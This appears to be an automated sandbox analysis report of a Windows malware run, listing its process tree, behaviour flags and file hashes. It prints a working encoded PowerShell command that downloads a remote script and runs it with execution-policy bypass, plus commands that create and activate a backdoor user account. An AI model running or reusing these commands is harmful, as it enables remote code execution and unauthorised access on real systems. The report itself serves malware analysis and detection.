C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1856
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:2272
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4060
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes1⤵PID:200
-
C:\Windows\system32\net.exenet user wgautilacc 1112132⤵PID:2824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 1112133⤵PID:208
-
C:\Windows\system32\net.exenet user wgautilacc /active:yes2⤵PID:3288
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc /active:yes3⤵PID:2120
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
b65a524824e6374c8f1ec95b6702ef4b
SHA18ed8708ad7a1916118b0144c74db30cea3015d61
SHA25669dc946b05ee08fd1968529b72171a5242bb5604d103aa91c64841871a9cbe09
SHA51248757c9c10b7b6409b2359ea0a8b875e0207ffa8cf3dca84d8f3d4f893e57bb0497ef7d265da3b3d37a7cd0e55961a71174e6fcd42793cb28a4ae775d674328f
-
MD5
507de1b722c9fdcaebd306a4fc0f91ed
SHA157599e9c0fe4d40de2dc2d3195c662ea8d919034
SHA256b32b71cbdd0f4523a20fc9d6e81210d5b9d1cf9d73d0bcb4271708c3b6e15fde
SHA5123f1427f20d79c5b8675b4903defdbfed121ecfb8e4649e9b0928b6cf45870bfd088b6f2a52c656ac3221b8f100ae54a8630c33948275bf02e5d504f7ecbf553b
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
00fb904b2dd958760943b89400e9b7f9
SHA18c825862b6f70cbaef991525f31100f713e61e7d
SHA256392e751cec2e13cbbea5161ae4044532961f8e9013cebaa120ac7553388c919a
SHA512ee4c598b268768f2a2063064ff2a771042bfa5b41e4c5029cb297a17c265a93ab749a3ffecfe28d9e5084068d77e487d14291e780a3d6da1e0fcfbc26b6bc28a
-
MD5
2688a9f689338d1f1157f569a1218f94
SHA19828b8589cf9261fd4c60ff9c3f7fac077974a9e
SHA2567f1b8d3123680bea472d0a12c86766fc58f384b4d1096bee3af57f04e8881d73
SHA512f089ed8bb0290c6084a895f1f6425e4518d8b991e150717803a4b774658182c222d255ef193eaa4de3b56d5a9ca94230ce2d52764b0553b056d8821a6470ef4b
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
52384383f2cf204e4eab8c31994eef9a
SHA1ac37124d6a41b4b142fb5fdc700800d817e228a5
SHA2560e1f857f52f3f0fd0865600789b398b5f4ad2e6b643d85f5d73c04c0f129ec16
SHA5124672edf9db38be39590e8329c4bb5d0fc021fd7daeebb44255500eb7af5137ba914100671e7bbd2ed2ed7480bac39b8a1ee74acb1d40ce56b13c65dd645b7506
-
MD5
b110f38845e18a04ab59a7d8a134ef40
SHA18119030034e6fbe62d875e824b5233c1f29d61a0
SHA2561cbd533a8cf6875e9b9bc60b11711b591bd30aac6377a11ee90c2735182414ea
SHA51280eb80651141c2e00165f089700cc15eb3c5e5eee4ce4e91759e63f5230db8445bc3793c0f5fd259f98ce2939f19633fe7225db990e6574fd739f1d29cf7f223
-
MD5
5768a809b9fcbff117dffa8cbf2e8852
SHA1a056e76d15bc7509d0361175b2ae4ba348460cd6
SHA2568ab19cdbe2b963c8bcf8cac6a11e003423ec91ffad88d885d550beb835e46094
SHA51299d14d6b3c6cf2e872def0b5dd76ffd81d4c71b577bf5fa4700dbb524d5d26bf09d4ffab2dfc6d493303711b635669f35e7cfc90578e6cc2e2f251f422818b8b